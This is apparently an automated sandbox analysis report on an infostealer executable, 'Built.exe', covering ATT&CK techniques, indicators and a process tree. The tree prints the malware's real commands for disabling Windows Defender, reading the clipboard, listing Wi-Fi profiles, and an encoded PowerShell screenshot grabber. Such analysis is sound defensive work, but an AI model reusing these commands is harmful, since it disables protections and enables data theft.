f09917d2ef0618e518048e45b668d4403aeca5db064953c1055f4543c43c2c9b

Analysis

max time kernel
140s
max time network
139s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
17-11-2024 17:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Built.exe
Size

5.9MB
MD5

e6f893eb863bbf2bc55753831a161809
SHA1

357b482f8bbdef2025a38e9b99bb401b28a34029
SHA256

f09917d2ef0618e518048e45b668d4403aeca5db064953c1055f4543c43c2c9b
SHA512

aa1b7c4aef24873333d732ce74c39d0ff3eac0d3ff3f33a513f8a39431c2d4a182217bff2eacbd94d7426ae49fd1eb696434673b7452fd2671cc5cfb3d2456bf
SSDEEP

98304:ic+iha9pi65sn6Wfz7pnxCjJaWlpx1dstaNoSwKHf1c3z5MOueAeF9zkkkkg4iOo:inisVDOYjJlpZstQoS9Hf12VKXGztkwK

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
2420	powershell.exe
2368	powershell.exe
348	powershell.exe
4556	powershell.exe
1744	powershell.exe

Drops file in Drivers directory 3 IoCs

Processes:

attrib.exeBuilt.exeattrib.exe

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Built.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

Processes:

cmd.exepowershell.exe

pid	Process
3464	cmd.exe
1996	powershell.exe

Executes dropped EXE 1 IoCs

Processes:

rar.exe

pid	Process
5020	rar.exe

Loads dropped DLL 16 IoCs

Processes:

Built.exe

pid	Process
3724	Built.exe
3724	Built.exe
3724	Built.exe
3724	Built.exe
3724	Built.exe
3724	Built.exe
3724	Built.exe
3724	Built.exe
3724	Built.exe
3724	Built.exe
3724	Built.exe
3724	Built.exe
3724	Built.exe
3724	Built.exe
3724	Built.exe
3724	Built.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

Processes:

flow	ioc
21	discord.com
22	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
19	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exe

pid	Process
4524	tasklist.exe
4752	tasklist.exe
2392	tasklist.exe
4068	tasklist.exe

UPX packed file 44 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/files/0x0007000000023ca1-21.dat	upx
behavioral2/memory/3724-25-0x00007FFA10920000-0x00007FFA10D85000-memory.dmp	upx
behavioral2/files/0x0007000000023c93-27.dat	upx
behavioral2/files/0x0007000000023c9f-29.dat	upx
behavioral2/memory/3724-32-0x00007FFA25B30000-0x00007FFA25B3F000-memory.dmp	upx
behavioral2/memory/3724-30-0x00007FFA240F0000-0x00007FFA24114000-memory.dmp	upx
behavioral2/files/0x0007000000023c9a-48.dat	upx
behavioral2/files/0x0007000000023c99-47.dat	upx
behavioral2/files/0x0007000000023c98-46.dat	upx
behavioral2/files/0x0007000000023c97-45.dat	upx
behavioral2/files/0x0007000000023c96-44.dat	upx
behavioral2/files/0x0007000000023c95-43.dat	upx
behavioral2/files/0x0007000000023c94-42.dat	upx
behavioral2/files/0x0007000000023c92-41.dat	upx
behavioral2/files/0x0007000000023ca6-40.dat	upx
behavioral2/files/0x0007000000023ca5-39.dat	upx
behavioral2/files/0x0007000000023ca4-38.dat	upx
behavioral2/files/0x0007000000023ca0-35.dat	upx
behavioral2/files/0x0007000000023c9e-34.dat	upx
behavioral2/memory/3724-54-0x00007FFA20430000-0x00007FFA2045C000-memory.dmp	upx
behavioral2/memory/3724-56-0x00007FFA200D0000-0x00007FFA200E8000-memory.dmp	upx
behavioral2/memory/3724-58-0x00007FFA200B0000-0x00007FFA200CE000-memory.dmp	upx
behavioral2/memory/3724-60-0x00007FFA103F0000-0x00007FFA10561000-memory.dmp	upx
behavioral2/memory/3724-62-0x00007FFA1AB50000-0x00007FFA1AB69000-memory.dmp	upx
behavioral2/memory/3724-64-0x00007FFA20690000-0x00007FFA2069D000-memory.dmp	upx
behavioral2/memory/3724-66-0x00007FFA1AB20000-0x00007FFA1AB4E000-memory.dmp	upx
behavioral2/memory/3724-72-0x00007FFA240F0000-0x00007FFA24114000-memory.dmp	upx
behavioral2/memory/3724-71-0x00007FFA11330000-0x00007FFA113E7000-memory.dmp	upx
behavioral2/memory/3724-70-0x00007FFA0FB80000-0x00007FFA0FEF7000-memory.dmp	upx
behavioral2/memory/3724-69-0x00007FFA10920000-0x00007FFA10D85000-memory.dmp	upx
behavioral2/memory/3724-76-0x00007FFA20510000-0x00007FFA2051D000-memory.dmp	upx
behavioral2/memory/3724-74-0x00007FFA241A0000-0x00007FFA241B5000-memory.dmp	upx
behavioral2/memory/3724-80-0x00007FFA10640000-0x00007FFA10758000-memory.dmp	upx
behavioral2/memory/3724-81-0x00007FFA200B0000-0x00007FFA200CE000-memory.dmp	upx
behavioral2/memory/3724-84-0x00007FFA103F0000-0x00007FFA10561000-memory.dmp	upx
behavioral2/memory/3724-137-0x00007FFA1AB50000-0x00007FFA1AB69000-memory.dmp	upx
behavioral2/memory/3724-174-0x00007FFA1AB20000-0x00007FFA1AB4E000-memory.dmp	upx
behavioral2/memory/3724-244-0x00007FFA0FB80000-0x00007FFA0FEF7000-memory.dmp	upx
behavioral2/memory/3724-257-0x00007FFA11330000-0x00007FFA113E7000-memory.dmp	upx
behavioral2/memory/3724-301-0x00007FFA103F0000-0x00007FFA10561000-memory.dmp	upx
behavioral2/memory/3724-300-0x00007FFA200B0000-0x00007FFA200CE000-memory.dmp	upx
behavioral2/memory/3724-296-0x00007FFA240F0000-0x00007FFA24114000-memory.dmp	upx
behavioral2/memory/3724-295-0x00007FFA10920000-0x00007FFA10D85000-memory.dmp	upx
behavioral2/memory/3724-310-0x00007FFA10920000-0x00007FFA10D85000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

netsh.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

Processes:

cmd.exenetsh.exe

pid	Process
1464	cmd.exe
2204	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

Processes:

WMIC.exe

pid	Process
2904	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

Processes:

systeminfo.exe

pid	Process
2104	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 25 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
2420	powershell.exe
2368	powershell.exe
2368	powershell.exe
4556	powershell.exe
4556	powershell.exe
2420	powershell.exe
2420	powershell.exe
2368	powershell.exe
2368	powershell.exe
1996	powershell.exe
1996	powershell.exe
4556	powershell.exe
3988	powershell.exe
3988	powershell.exe
1996	powershell.exe
3988	powershell.exe
1744	powershell.exe
1744	powershell.exe
1744	powershell.exe
4560	powershell.exe
4560	powershell.exe
348	powershell.exe
348	powershell.exe
2200	powershell.exe
2200	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exetasklist.exetasklist.exepowershell.exepowershell.exeWMIC.exepowershell.exetasklist.exepowershell.exetasklist.exepowershell.exepowershell.exeWMIC.exe

description	pid	Process
Token: SeDebugPrivilege	2420	powershell.exe
Token: SeDebugPrivilege	4752	tasklist.exe
Token: SeDebugPrivilege	4524	tasklist.exe
Token: SeDebugPrivilege	2368	powershell.exe
Token: SeDebugPrivilege	4556	powershell.exe
Token: SeIncreaseQuotaPrivilege	2240	WMIC.exe
Token: SeSecurityPrivilege	2240	WMIC.exe
Token: SeTakeOwnershipPrivilege	2240	WMIC.exe
Token: SeLoadDriverPrivilege	2240	WMIC.exe
Token: SeSystemProfilePrivilege	2240	WMIC.exe
Token: SeSystemtimePrivilege	2240	WMIC.exe
Token: SeProfSingleProcessPrivilege	2240	WMIC.exe
Token: SeIncBasePriorityPrivilege	2240	WMIC.exe
Token: SeCreatePagefilePrivilege	2240	WMIC.exe
Token: SeBackupPrivilege	2240	WMIC.exe
Token: SeRestorePrivilege	2240	WMIC.exe
Token: SeShutdownPrivilege	2240	WMIC.exe
Token: SeDebugPrivilege	2240	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2240	WMIC.exe
Token: SeRemoteShutdownPrivilege	2240	WMIC.exe
Token: SeUndockPrivilege	2240	WMIC.exe
Token: SeManageVolumePrivilege	2240	WMIC.exe
Token: 33	2240	WMIC.exe
Token: 34	2240	WMIC.exe
Token: 35	2240	WMIC.exe
Token: 36	2240	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2240	WMIC.exe
Token: SeSecurityPrivilege	2240	WMIC.exe
Token: SeTakeOwnershipPrivilege	2240	WMIC.exe
Token: SeLoadDriverPrivilege	2240	WMIC.exe
Token: SeSystemProfilePrivilege	2240	WMIC.exe
Token: SeSystemtimePrivilege	2240	WMIC.exe
Token: SeProfSingleProcessPrivilege	2240	WMIC.exe
Token: SeIncBasePriorityPrivilege	2240	WMIC.exe
Token: SeCreatePagefilePrivilege	2240	WMIC.exe
Token: SeBackupPrivilege	2240	WMIC.exe
Token: SeRestorePrivilege	2240	WMIC.exe
Token: SeShutdownPrivilege	2240	WMIC.exe
Token: SeDebugPrivilege	2240	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2240	WMIC.exe
Token: SeRemoteShutdownPrivilege	2240	WMIC.exe
Token: SeUndockPrivilege	2240	WMIC.exe
Token: SeManageVolumePrivilege	2240	WMIC.exe
Token: 33	2240	WMIC.exe
Token: 34	2240	WMIC.exe
Token: 35	2240	WMIC.exe
Token: 36	2240	WMIC.exe
Token: SeDebugPrivilege	1996	powershell.exe
Token: SeDebugPrivilege	2392	tasklist.exe
Token: SeDebugPrivilege	3988	powershell.exe
Token: SeDebugPrivilege	4068	tasklist.exe
Token: SeDebugPrivilege	1744	powershell.exe
Token: SeDebugPrivilege	4560	powershell.exe
Token: SeIncreaseQuotaPrivilege	4092	WMIC.exe
Token: SeSecurityPrivilege	4092	WMIC.exe
Token: SeTakeOwnershipPrivilege	4092	WMIC.exe
Token: SeLoadDriverPrivilege	4092	WMIC.exe
Token: SeSystemProfilePrivilege	4092	WMIC.exe
Token: SeSystemtimePrivilege	4092	WMIC.exe
Token: SeProfSingleProcessPrivilege	4092	WMIC.exe
Token: SeIncBasePriorityPrivilege	4092	WMIC.exe
Token: SeCreatePagefilePrivilege	4092	WMIC.exe
Token: SeBackupPrivilege	4092	WMIC.exe
Token: SeRestorePrivilege	4092	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Built.exeBuilt.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	Process	procid_target
PID 1592 wrote to memory of 3724	1592	Built.exe	83
PID 1592 wrote to memory of 3724	1592	Built.exe	83
PID 3724 wrote to memory of 4644	3724	Built.exe	87
PID 3724 wrote to memory of 4644	3724	Built.exe	87
PID 3724 wrote to memory of 1624	3724	Built.exe	88
PID 3724 wrote to memory of 1624	3724	Built.exe	88
PID 3724 wrote to memory of 4732	3724	Built.exe	90
PID 3724 wrote to memory of 4732	3724	Built.exe	90
PID 3724 wrote to memory of 3292	3724	Built.exe	91
PID 3724 wrote to memory of 3292	3724	Built.exe	91
PID 4644 wrote to memory of 2420	4644	cmd.exe	95
PID 4644 wrote to memory of 2420	4644	cmd.exe	95
PID 3724 wrote to memory of 3532	3724	Built.exe	96
PID 3724 wrote to memory of 3532	3724	Built.exe	96
PID 3724 wrote to memory of 4428	3724	Built.exe	97
PID 3724 wrote to memory of 4428	3724	Built.exe	97
PID 3292 wrote to memory of 2368	3292	cmd.exe	100
PID 3292 wrote to memory of 2368	3292	cmd.exe	100
PID 4428 wrote to memory of 4524	4428	cmd.exe	102
PID 4428 wrote to memory of 4524	4428	cmd.exe	102
PID 1624 wrote to memory of 4556	1624	cmd.exe	103
PID 1624 wrote to memory of 4556	1624	cmd.exe	103
PID 4732 wrote to memory of 1304	4732	cmd.exe	104
PID 4732 wrote to memory of 1304	4732	cmd.exe	104
PID 3532 wrote to memory of 4752	3532	cmd.exe	101
PID 3532 wrote to memory of 4752	3532	cmd.exe	101
PID 3724 wrote to memory of 1408	3724	Built.exe	105
PID 3724 wrote to memory of 1408	3724	Built.exe	105
PID 3724 wrote to memory of 3464	3724	Built.exe	107
PID 3724 wrote to memory of 3464	3724	Built.exe	107
PID 3724 wrote to memory of 5052	3724	Built.exe	109
PID 3724 wrote to memory of 5052	3724	Built.exe	109
PID 3724 wrote to memory of 4636	3724	Built.exe	110
PID 3724 wrote to memory of 4636	3724	Built.exe	110
PID 1408 wrote to memory of 2240	1408	cmd.exe	112
PID 1408 wrote to memory of 2240	1408	cmd.exe	112
PID 3724 wrote to memory of 1444	3724	Built.exe	113
PID 3724 wrote to memory of 1444	3724	Built.exe	113
PID 3724 wrote to memory of 1464	3724	Built.exe	111
PID 3724 wrote to memory of 1464	3724	Built.exe	111
PID 3724 wrote to memory of 1620	3724	Built.exe	116
PID 3724 wrote to memory of 1620	3724	Built.exe	116
PID 3724 wrote to memory of 3796	3724	Built.exe	119
PID 3724 wrote to memory of 3796	3724	Built.exe	119
PID 3464 wrote to memory of 1996	3464	cmd.exe	123
PID 3464 wrote to memory of 1996	3464	cmd.exe	123
PID 1464 wrote to memory of 2204	1464	cmd.exe	124
PID 1464 wrote to memory of 2204	1464	cmd.exe	124
PID 1444 wrote to memory of 2104	1444	cmd.exe	125
PID 1444 wrote to memory of 2104	1444	cmd.exe	125
PID 5052 wrote to memory of 2392	5052	cmd.exe	126
PID 5052 wrote to memory of 2392	5052	cmd.exe	126
PID 1620 wrote to memory of 5104	1620	cmd.exe	127
PID 1620 wrote to memory of 5104	1620	cmd.exe	127
PID 4636 wrote to memory of 4880	4636	cmd.exe	141
PID 4636 wrote to memory of 4880	4636	cmd.exe	141
PID 3796 wrote to memory of 3988	3796	cmd.exe	129
PID 3796 wrote to memory of 3988	3796	cmd.exe	129
PID 3724 wrote to memory of 2328	3724	Built.exe	130
PID 3724 wrote to memory of 2328	3724	Built.exe	130
PID 3724 wrote to memory of 912	3724	Built.exe	132
PID 3724 wrote to memory of 912	3724	Built.exe	132
PID 912 wrote to memory of 4936	912	cmd.exe	175
PID 912 wrote to memory of 4936	912	cmd.exe	175

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exeattrib.exe

pid	Process
3076	attrib.exe
4244	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Built.exe
"C:\Users\Admin\AppData\Local\Temp\Built.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1592
- C:\Users\Admin\AppData\Local\Temp\Built.exe
  "C:\Users\Admin\AppData\Local\Temp\Built.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4644
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1624
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Error: Run as Administrator', 0, 'Error: Run as Administrator', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4732
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Error: Run as Administrator', 0, 'Error: Run as Administrator', 0+16);close()"
      4⤵
      PID:1304
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3292
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3532
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4428
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1408
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:3464
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5052
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4636
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:1464
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:2204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1444
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:2104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1620
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:5104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3796
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
